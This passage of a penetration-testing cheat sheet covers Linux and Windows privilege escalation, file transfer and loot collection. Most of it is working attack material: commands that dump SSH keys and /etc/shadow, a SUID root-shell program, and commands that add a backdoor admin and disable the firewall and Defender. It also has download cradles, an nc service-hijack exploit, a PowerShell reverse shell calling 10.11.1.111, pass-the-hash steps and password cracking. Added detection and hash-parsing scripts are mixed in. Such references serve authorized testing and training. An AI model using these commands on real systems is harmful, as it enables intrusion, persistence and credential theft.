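    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        rel = os.path.relpath(dirpath, root)
        rel_dir = "/" if rel == "." else "/" + rel.replace(os.sep, "/")
        dirnames[:] = [d for d in dirnames if rel_dir.rstrip("/") + "/" + d not in PSEUDO_FS]
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue                        # vanished or unreadable: skip
            if not stat.S_ISREG(st.st_mode):    # symlinks, sockets, devices are not audited
                continue
            report.findings.extend(
                classify(full, rel_dir, stat.S_IMODE(st.st_mode), st.st_uid, privileged))
    return report


def build_sample_tree() -> str:
    """Constructed demo tree, not a real system.  Its files belong to the current user,
    so run_demo() treats that uid as the privileged one."""
    root = tempfile.mkdtemp(prefix="privaudit-")

    def put(rel, mode):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(full, mode)

    put("usr/bin/passwd", 0o4755)          # expected SUID in a system bin dir
    put("usr/local/bin/backup", 0o4755)    # SUID where none is expected
    put("etc/cron.daily/cleanup", 0o777)   # privileged owner, writable by everyone
    put("home/user/notes.txt", 0o644)      # clean
    return root


def run_demo():
    root = build_sample_tree()
    return root, audit_tree(root, privileged_uids=(os.getuid(),))


if __name__ == "__main__":
    _, report = (None, audit_tree(sys.argv[1])) if len(sys.argv) > 1 else run_demo()
    for f in report.findings:
        print(f"{f.kind:14s} {f.mode} uid={f.uid} {f.path}")
```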
1444 |
1445 | ### SSH Keys
1446 |
1447 | Check all home directories
1448 |
1449 | ```
1450 | cat ~/.ssh/authorized_keys
1451 | cat ~/.ssh/identity.pub
1452 | cat ~/.ssh/identity
1453 | cat ~/.ssh/id_rsa.pub
1454 | cat ~/.ssh/id_rsa
1455 | cat ~/.ssh/id_dsa.pub
1456 | cat ~/.ssh/id_dsa
1457 | cat /etc/ssh/ssh_config
1458 | cat /etc/ssh/sshd_config
1459 | cat /etc/ssh/ssh_host_dsa_key.pub
1460 | cat /etc/ssh/ssh_host_dsa_key
1461 | cat /etc/ssh/ssh_host_rsa_key.pub
1462 | cat /etc/ssh/ssh_host_rsa_key
1463 | cat /etc/ssh/ssh_host_key.pub
1464 | cat /etc/ssh/ssh_host_key
1465 | ```
1466 |
1467 | ### Bad path configuration
1468 |
1469 | Requires user interaction
1470 |
1471 | ### Find plain passwords
1472 |
1473 | ```
1474 | grep -rnw '/' -ie 'pass' --color=always
1475 | grep -rnw '/' -ie 'DB_PASS' --color=always
1476 | grep -rnw '/' -ie 'DB_PASSWORD' --color=always
1477 | grep -rnw '/' -ie 'DB_USER' --color=always
1478 | ```
1479 |
1480 | ### Scripts
1481 |
1482 | #### SUID
1483 |
1484 | ```
1485 | #define _GNU_SOURCE
1486 | #include <stdlib.h>
1487 | #include <unistd.h>
1488 |
1489 | int main(void){
1490 |     setresuid(0, 0, 0);
1491 |     system("/bin/bash");
1492 |     return 0;
1493 | }
1494 |
1495 | # Compile
1496 | gcc suid.c -o suid
1497 | ```
1493 |
1494 | #### PS Monitor for cron
1495 |
1496 | ```
1497 | #!/bin/bash
1498 |
1499 | # Loop by line
1500 | IFS=$'\n'
1501 |
1502 | old_process=$(ps -eo command)
1503 |
1504 | while true; do
1505 |     new_process=$(ps -eo command)
1506 |     # print only processes that appeared (>) or disappeared (<) since the last sample
1507 |     diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
1508 |     sleep 1
1509 |     old_process=$new_process
1510 | done
1511 | ```
1512 |
1513 | ### Linux Privesc Tools
1514 |
1515 | - [GTFOBins](https://gtfobins.github.io/)
1516 | - [LinEnum](https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh)
1517 | - [LinuxExploitSuggester](https://gitlab.com/kalilinux/packages/linux-exploit-suggester/blob/kali/master/Linux_Exploit_Suggester.pl)
1518 | - [linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py)
1519 |
1520 | ### Linux Precompiled Exploits
1521 | - [kernel-exploits](https://github.com/lucyoa/kernel-exploits)
1522 |
1523 | ## Windows
1524 |
1525 | Now we start the whole enumeration process over again. This is a checklist: check off every single item, in this order.
1526 |
1527 | - Kernel exploits
1528 | - Cleartext password
1529 | - Reconfigure service parameters
1530 | - Inside service
1531 | - Program running as root
1532 | - Installed software
1533 | - Scheduled tasks
1534 | - Weak passwords
1535 |
1536 | ### Basic info
1537 |
1538 | ```
1539 | systeminfo
1540 | set
1541 | hostname
1542 | net users
1543 | net user user1
1544 | net localgroup
1545 | accesschk.exe -uwcqv "Authenticated Users" *
1546 |
1547 | netsh firewall show state
1548 | netsh firewall show config
1549 |
1550 | # Set path
1551 | set PATH=%PATH%;C:\xampp\php
1552 |
1553 | whoami /priv
1554 |
1555 | dir /a -> Show hidden & unhidden files
1556 | dir /Q -> Show file ownership
1557 | ```
1558 |
1559 | ### Kernel exploits
1560 |
1561 |
1562 | ```
1563 | # Look for hotfixes
1564 | systeminfo
1565 |
1566 | wmic qfe get Caption,Description,HotFixID,InstalledOn
1567 |
1568 | # Search for exploits
1569 | site:exploit-db.com windows XX XX
1570 | ```
1571 |
1572 | ### Cleartext passwords
1573 |
1574 | ```
1575 | # Windows autologin
1576 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
1577 |
1578 | # VNC
1579 | reg query "HKCU\Software\ORL\WinVNC3\Password"
1580 |
1581 | # SNMP Parameters
1582 | reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
1583 |
1584 | # Putty
1585 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
1586 |
1587 | # Search for password in registry
1588 | reg query HKLM /f password /t REG_SZ /s
1589 | reg query HKCU /f password /t REG_SZ /s
1590 | ```
1591 |
1592 | ### Reconfigure service parameters
1593 |
1594 | - Unquoted service paths
1595 |
1596 | - Weak service permissions
1597 |
1598 | https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
1599 |
1600 | ### Dump process for passwords
1601 |
1602 | ```powershell
1603 | # Dump the Firefox process (replace $PID-FF with its PID from Get-Process) and search the dump
1604 | Get-Process
1605 | ./procdump64.exe -ma $PID-FF
1606 | Select-String -Path .\*.dmp -Pattern 'password' > 1.txt
1607 | type 1.txt | findstr /s /i "admin"
1608 | ```
1609 |
1610 | ### Inside service
1611 |
1612 | Check netstat to see what ports are open from outside and from inside. Look for ports only available on the inside.
1613 |
1614 | ```
1615 | # Meterpreter
1616 | run get_local_subnets
1617 |
1618 | netstat /a
1619 | netstat -ano
1620 | ```
1621 |
1622 | ### Programs running as root/system
1623 |
1624 | ### Installed software
1625 |
1626 | ```
1627 | # Metasploit
1628 | ps
1629 |
1630 | tasklist /SVC
1631 | net start
1632 | reg query HKEY_LOCAL_MACHINE\SOFTWARE
1633 | DRIVERQUERY
1634 |
1635 | Look in:
1636 | C:\Program files
1637 | C:\Program files (x86)
1638 | Home directory of the user
1639 | ```
1640 |
1641 | ### Scheduled tasks
1642 |
1643 | ```
1644 | schtasks /query /fo LIST /v
1645 |
1646 | Check this file:
1647 | c:\WINDOWS\SchedLgU.Txt
1648 | ```
1649 |
1650 | ### Weak passwords
1651 |
1652 | Remote desktop
1653 |
1654 | ```
1655 | ncrack -vv --user george -P /root/oscp/passwords.txt rdp://10.11.1.111
1656 | ```
1657 |
1658 | ### Add user and enable RDP
1659 |
1660 | ```
1661 | # Add new user
1662 |
1663 | net user haxxor Haxxor123 /add
1664 | net localgroup Administrators haxxor /add
1665 | net localgroup "Remote Desktop Users" haxxor /ADD
1666 |
1667 | # Turn firewall off and enable RDP
1668 |
1669 | sc stop WinDefend
1670 | netsh advfirewall show allprofiles
1671 | netsh advfirewall set allprofiles state off
1672 | netsh firewall set opmode disable
1673 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
1674 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
1675 | ```
1676 |
1677 | ### Powershell sudo for Windows
1678 |
1679 | ```
1680 | $pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
1681 | $pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
1682 | $script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
1683 | Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'
1684 |
1685 | powershell -ExecutionPolicy Bypass -File xyz.ps1
1686 | ```
1687 |
1688 | ### Windows download with bitsadmin
1689 |
1690 | ```
1691 | bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
1692 | ```
1693 |
1694 | ### Windows download with certutil.exe
1695 |
1696 | ```
1697 | certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat
1698 | ```
1699 |
1700 | ### Windows download with powershell
1701 |
1702 | ```
1703 | powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.1.111/file.exe','C:\Users\user\Desktop\file.exe')"
1704 |
1705 | (New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list")
1706 | ```
1707 |
1708 | ### Windows Download from FTP
1709 |
1710 | ```
1711 | # In reverse shell
1712 | echo open 10.11.1.111 > ftp.txt
1713 | echo USER anonymous >> ftp.txt
1714 | echo ftp >> ftp.txt
1715 | echo bin >> ftp.txt
1716 | echo GET file >> ftp.txt
1717 | echo bye >> ftp.txt
1718 |
1719 | # Execute
1720 | ftp -v -n -s:ftp.txt
1721 | ```
1722 |
1723 | ### Windows create SMB Server transfer files
1724 |
```bash
# Attack machine: impacket SMB server sharing a directory as "Lab"
python /usr/share/doc/python-impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111"
# On current Kali the script is installed as impacket-smbserver; add -smb2support for Windows 10+ clients
impacket-smbserver Lab /root/labs/public/10.11.1.111 -smb2support

# Or a real Samba service (guest, read-only share)
# http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
vim /etc/samba/smb.conf
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

chmod -R 777 smb_path
chown -R nobody:nobody smb_path
service smbd restart

# Victim machine with reverse shell
# The share name must match the server: Lab for the impacket server, ica for the Samba config above
Download: copy \\10.11.1.111\Lab\wce.exe .
# Upload only works against the impacket server; the Samba share above is read-only
Upload: copy wtf.jpg \\10.11.1.111\Lab

```
1760 |
1761 | ### Windows download with VBS
1762 |
1763 | ````
1764 | # In reverse shell
1765 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs
1766 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
1767 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
1768 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
1769 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
1770 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
1771 | echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
1772 | echo Err.Clear >> wget.vbs
1773 | echo Set http = Nothing >> wget.vbs
1774 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
1775 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
1776 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
1777 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
1778 | echo http.Open "GET",strURL,False >> wget.vbs
1779 | echo http.Send >> wget.vbs
1780 | echo varByteArray = http.ResponseBody >> wget.vbs
1781 | echo Set http = Nothing >> wget.vbs
1782 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
1783 | echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
1784 | echo strData = "" >> wget.vbs
1785 | echo strBuffer = "" >> wget.vbs
1786 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
1787 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
1788 | echo Next >> wget.vbs
1789 | echo ts.Close >> wget.vbs
1790 |
1791 | # Execute
1792 | cscript wget.vbs http://10.11.1.111/file.exe file.exe
1793 | ````
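Each of the download methods above (bitsadmin, certutil, the PowerShell WebClient cradle and the WinHttpRequest VBS script) announces itself in the web server log through its default User-Agent, which is what a blue team keys on when it triages traffic to the attack machine. The following Python script is an added example, not part of the original cheat sheet: it runs a prefix-based classifier over constructed combined-format access log lines and reports which LOLBin fetched which executable. The User-Agent prefixes are typical Windows 10 defaults (version suffixes vary by build, so only the prefix is matched); the log lines and the 10.11.1.5 client address are made up for the example.

```python
import re

# Typical default User-Agent prefixes of the Windows download methods listed above.
# Values as commonly observed on Windows 10; version suffixes vary by build, so match on prefix.
# System.Net.WebClient sends no User-Agent header at all (logged as "-"), which is
# itself a strong signal, so it is handled separately in classify_ua().
UA_FINGERPRINTS = {
    "Microsoft BITS/": "bitsadmin",
    "Microsoft-CryptoAPI/": "certutil",
    "WindowsPowerShell/": "Invoke-WebRequest",
    "WinHttp.WinHttpRequest": "vbs WinHttpRequest",
}

# Combined Log Format: client - - [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify_ua(ua: str) -> str:
    """Map a User-Agent string to the download tool that produced it."""
    if ua in ("", "-"):
        return "powershell WebClient (no User-Agent)"
    for prefix, tool in UA_FINGERPRINTS.items():
        if prefix in ua:
            return tool
    return "unknown"


def suspicious_downloads(log_text: str, exts=(".exe", ".ps1", ".bat", ".vbs", ".dll")):
    """Return (client, path, tool) for successful fetches of executable-looking files by a LOLBin."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tool = classify_ua(m["ua"])
        if tool == "unknown" or m["status"] != "200":
            continue
        if m["path"].lower().endswith(exts):
            hits.append((m["ip"], m["path"], tool))
    return hits


# Constructed sample log lines (not real traffic); the attack box at 10.11.1.111 is the web server
SAMPLE_LOG = """\
10.11.1.5 - - [01/Jan/2020:10:00:01 +0000] "GET /xyz.exe HTTP/1.1" 200 73802 "-" "Microsoft BITS/7.8"
10.11.1.5 - - [01/Jan/2020:10:00:07 +0000] "GET /Powerless.bat HTTP/1.1" 200 9111 "-" "Microsoft-CryptoAPI/10.0"
10.11.1.5 - - [01/Jan/2020:10:00:12 +0000] "GET /file.exe HTTP/1.1" 200 73802 "-" "-"
10.11.1.5 - - [01/Jan/2020:10:00:20 +0000] "GET /file.exe HTTP/1.1" 200 73802 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
10.11.1.9 - - [01/Jan/2020:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/70.0"
10.11.1.5 - - [01/Jan/2020:10:02:00 +0000] "GET /missing.exe HTTP/1.1" 404 196 "-" "Microsoft-CryptoAPI/10.0"
"""

if __name__ == "__main__":
    for ip, path, tool in suspicious_downloads(SAMPLE_LOG):
        print(f"{ip} fetched {path} via {tool}")
```

Run as-is it reports the four LOLBin fetches; the browser request and the failed (404) certutil attempt are ignored. Setting a browser-like User-Agent on the WebClient object (its `Headers` collection) is the obvious way to blend in, which is why a defender should not rely on the UA alone.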
1794 |
### Windows XP SP1 PrivEsc

```bash
# On XP SP0/SP1 the upnphost service has a weak DACL that lets ordinary users change
# its configuration: point the binary path at a reverse shell and start the service as SYSTEM.
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.1.111 4343 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
# Drop the dependency on SSDPSRV so the service starts on its own
sc config upnphost depend= ""
net start upnphost
```
1804 |
### Pass The Hash

```
# Log in as a user with only the NTLM hash from a hashdump (no cleartext password needed).
# The account must be a local admin on the target (psexec writes to ADMIN$).
# From this hashdump (format user:RID:LM:NT:::; aad3b435... is the LM hash of the empty string)
# admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target address range or CIDR identifier
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/smb/psexec) > set rhosts 10.10.0.100
rhosts => 10.10.0.100

msf5 exploit(windows/smb/psexec) > set smbuser admin2
smbuser => admin2

# SMBPass takes the full LM:NT pair in place of a password
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7
smbpass => aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7

msf5 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
```
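The session above works because SMBPass accepts the raw LM:NT pair from a hashdump line in place of a password. The Python below is an added example, not from the original page or from Metasploit: it parses pwdump-style lines, flags the empty LM half (aad3b435... means LM storage is disabled, which is the norm on anything after XP), builds the SMBPass string, and implements the NT hash (MD4 over the UTF-16LE password) in pure Python so a password guess can be checked offline without hashlib's md4, which OpenSSL 3 builds usually disable. The admin2 line is the hashdump line quoted above; the svc_backup line is constructed for the example.

```python
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string: LM storage is disabled


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_round(A, B, C, D, X, f, order, shifts, const):
    # One MD4 round: 16 steps cycling through the A, D, C, B slots (RFC 1320)
    for j, k in enumerate(order):
        s = shifts[j % 4]
        if j % 4 == 0:
            A = _rotl((A + f(B, C, D) + X[k] + const) & MASK, s)
        elif j % 4 == 1:
            D = _rotl((D + f(A, B, C) + X[k] + const) & MASK, s)
        elif j % 4 == 2:
            C = _rotl((C + f(D, A, B) + X[k] + const) & MASK, s)
        else:
            B = _rotl((B + f(C, D, A) + X[k] + const) & MASK, s)
    return A, B, C, D


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = bytearray(data) + b"\x80"            # padding: 0x80, zeros to 56 mod 64, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = h
        A, B, C, D = _md4_round(A, B, C, D, X, F, range(16), (3, 7, 11, 19), 0)
        A, B, C, D = _md4_round(A, B, C, D, X, G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999)
        A, B, C, D = _md4_round(A, B, C, D, X, H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1)
        h = [(v + w) & MASK for v, w in zip(h, (A, B, C, D))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password, no salt."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(line: str) -> dict:
    """Parse one pwdump-style line user:rid:LM:NT::: as produced by hashdump."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "lm_disabled": lm.lower() == EMPTY_LM}


def smbpass_for_psexec(entry: dict) -> str:
    """psexec's SMBPass takes the full LM:NT pair even when the LM half is the empty-string hash."""
    return f"{entry['lm']}:{entry['nt']}"


def check_candidate(entry: dict, password: str) -> bool:
    """Offline check of one password guess against the NT hash (what john/hashcat do at scale)."""
    return nt_hash(password) == entry["nt"]


# Constructed sample: the hashdump line from the page plus a second account with a known weak password
SAMPLE_DUMP = """\
admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    for line in SAMPLE_DUMP.splitlines():
        e = parse_hashdump(line)
        print(e["user"], "SMBPass =", smbpass_for_psexec(e),
              "| LM disabled:", e["lm_disabled"], "| is 'password'?", check_candidate(e, "password"))
```

Because the NT hash is unsalted, the hash itself is password-equivalent: anything that accepts NTLM authentication (SMB, WinRM, RDP with restricted admin mode) can be logged into with the pair alone, which is why the hashes deserve the same handling as cleartext passwords in the loot.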
1851 |
1852 | ### Scripts
1853 |
1854 | #### Useradd
1855 |
````
#include <stdlib.h>   /* system */

/* Creates a local administrator (same account as the net user commands above);
   useful when an exploit runs an arbitrary binary as SYSTEM */
int main(void)
{
    system("net user haxxor Haxxor123 /add && net localgroup administrators haxxor /add");
    return 0;
}

# Compile (cross-compile on Kali)
i686-w64-mingw32-gcc -o useradd.exe useradd.c
````
1869 |
1870 | #### Powershell Run As
1871 |
```
# Build runas.ps1 from cmd.exe (in a PowerShell prompt the $ variables would expand before echo)
echo $username = '' > runas.ps1
echo $securePassword = ConvertTo-SecureString "" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1

# Run it
powershell -ExecutionPolicy Bypass -File runas.ps1
```
1878 |
1879 | #### Powershell Reverse Shell
1880 |
```powershell
# Bypass the execution policy for this process only (no admin rights needed for this scope)
Set-ExecutionPolicy Bypass -Scope Process

# One-liner TCP reverse shell; 10.11.1.111:4444 is the listener (nc -lvnp 4444 on the attack machine)
$client = New-Object System.Net.Sockets.TCPClient('10.11.1.111',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
1886 |
1887 |
1888 |
1889 | ### Windows privesc/enum tools
1890 |
1891 | - [windows-exploit-suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py)
1892 | - [windows-privesc-check](https://github.com/pentestmonkey/windows-privesc-check)
1893 | - [PowerUp](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1)
1894 |
1895 | ### Windows precompiled exploits
1896 |
1897 | - [WindowsExploits](https://github.com/abatchy17/WindowsExploits)
1898 |
1899 | ### Windows Port Forwarding
1900 |
Run on the victim to expose its local WinRM port (5985) on the attack machine. `LOCALUSER`, `LOCALPASSWORD` and `LOCALIP` are the SSH credentials and address of the attack machine and `-P 221` its SSH port; the victim's `127.0.0.1:5985` then appears as `127.0.0.1:5985` on the attack machine (a remote forward binds to loopback unless `GatewayPorts` is enabled in sshd_config). The leading `echo y` auto-accepts the SSH host key, which plink otherwise prompts for and a non-interactive shell cannot answer:

`cmd.exe /c echo y | plink -l LOCALUSER -pw LOCALPASSWORD LOCALIP -R 5985:127.0.0.1:5985 -P 221`
1904 |
1905 |
1906 |
1907 | # **Loot**
1908 |
1909 | ## Linux
1910 |
1911 | **Checklist**
1912 |
1913 | - Proof:
1914 | - Network secret:
1915 | - Passwords and hashes:
1916 | - Dualhomed:
1917 | - Tcpdump:
1918 | - Interesting files:
1919 | - Databases:
1920 | - SSH-keys:
1921 | - Browser:
1922 | - Mail:
1923 |
1924 | ### Proof
1925 | ```
1926 | echo -e '\n'HOSTNAME: && hostname && echo -e '\n'WHOAMI: && whoami && echo -e '\n'PROOF: && cat proof.txt && echo -e '\n'IFCONFIG: && /sbin/ifconfig && echo -e '\n'PASSWD: && cat /etc/passwd && echo -e '\n'SHADOW: && cat /etc/shadow && echo -e '\n'NETSTAT: && netstat -antup
1927 | ```
1928 |
1929 |
1930 | ### Network secret
1931 |
1932 | ```
1933 | /root/network-secret.txt
1934 | ```
1935 |
1936 | ### Passwords and hashes
1937 |
1938 | ```
1939 | cat /etc/passwd
1940 | cat /etc/shadow
1941 |
1942 | unshadow passwd shadow > unshadowed.txt
1943 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
1944 | ```
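unshadow and john above do two things worth seeing spelled out: merging the hash from /etc/shadow back into the passwd record, and deciding which records carry a crackable hash at all (locked or passwordless accounts, and the `$id$` prefix that tells john which crypt(3) scheme to use). The Python below is an added example, not from the page or from John the Ripper: it reimplements the unshadow merge over constructed passwd and shadow snippets and classifies each password field by its prefix. The hash bodies in the sample are placeholders, not real hashes.

```python
# crypt(3) "$id$" prefixes as they appear in /etc/shadow on Linux
CRYPT_IDS = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}


def hash_scheme(field: str) -> str:
    """Classify a shadow password field: no hash (locked/passwordless), a known scheme, legacy DES or unknown."""
    if field == "" or field.startswith(("!", "*")):
        return "no-hash"      # "!" prefix = account locked, "*" = password login disabled, "" = no password
    for prefix, name in CRYPT_IDS.items():
        if field.startswith(prefix):
            return name
    return "descrypt" if len(field) == 13 else "unknown"


def unshadow(passwd_text: str, shadow_text: str) -> list:
    """Merge passwd and shadow the way unshadow(1) does: passwd lines with the hash in field 2."""
    shadow = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            shadow[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if fields[0] in shadow:   # users without a shadow entry keep whatever passwd holds ("x")
            fields[1] = shadow[fields[0]]
        merged.append(":".join(fields))
    return merged


def crackable(merged: list) -> list:
    """Keep only entries that carry a real hash (what john will actually attempt), tagged with the scheme."""
    out = []
    for line in merged:
        user, field = line.split(":")[:2]
        scheme = hash_scheme(field)
        if scheme != "no-hash":
            out.append((user, scheme, line))
    return out


# Constructed sample files (not from a real host); hash bodies are placeholders, not real hashes
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/zsh
"""
SAMPLE_SHADOW = """\
root:$6$SALTSALT$PLACEHOLDERHASHNOTREAL:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
alice:$y$j9T$SALTSALT$PLACEHOLDERHASHNOTREAL:18000:0:99999:7:::
bob:!$6$SALTSALT$PLACEHOLDERHASHNOTREAL:18000:0:99999:7:::
"""

if __name__ == "__main__":
    # In a real run the merged lines are what you write to unshadowed.txt for john
    for user, scheme, line in crackable(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)):
        print(f"{user:10} {scheme:12} {line}")
```

Only root (sha512crypt) and alice (yescrypt) come out as crackable: daemon has no password login and bob's hash is locked with a leading `!`, so feeding those to john just wastes time. The scheme matters for the wordlist run above as well: md5crypt and sha512crypt are cheap per guess, bcrypt and yescrypt are deliberately slow, so prioritise the fast ones.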
1945 |
1946 | ### Dualhomed
1947 |
1948 | ```
1949 | ifconfig
1950 | ifconfig -a
1951 | arp -a
1952 | ```
1953 |
1954 | ### Tcpdump
1955 |
1956 | ```
1957 | tcpdump -i any -s0 -w capture.pcap
1958 | tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111
1959 | tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111
1960 | ```
1961 |
1962 | ### Interesting files
1963 |
```
#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
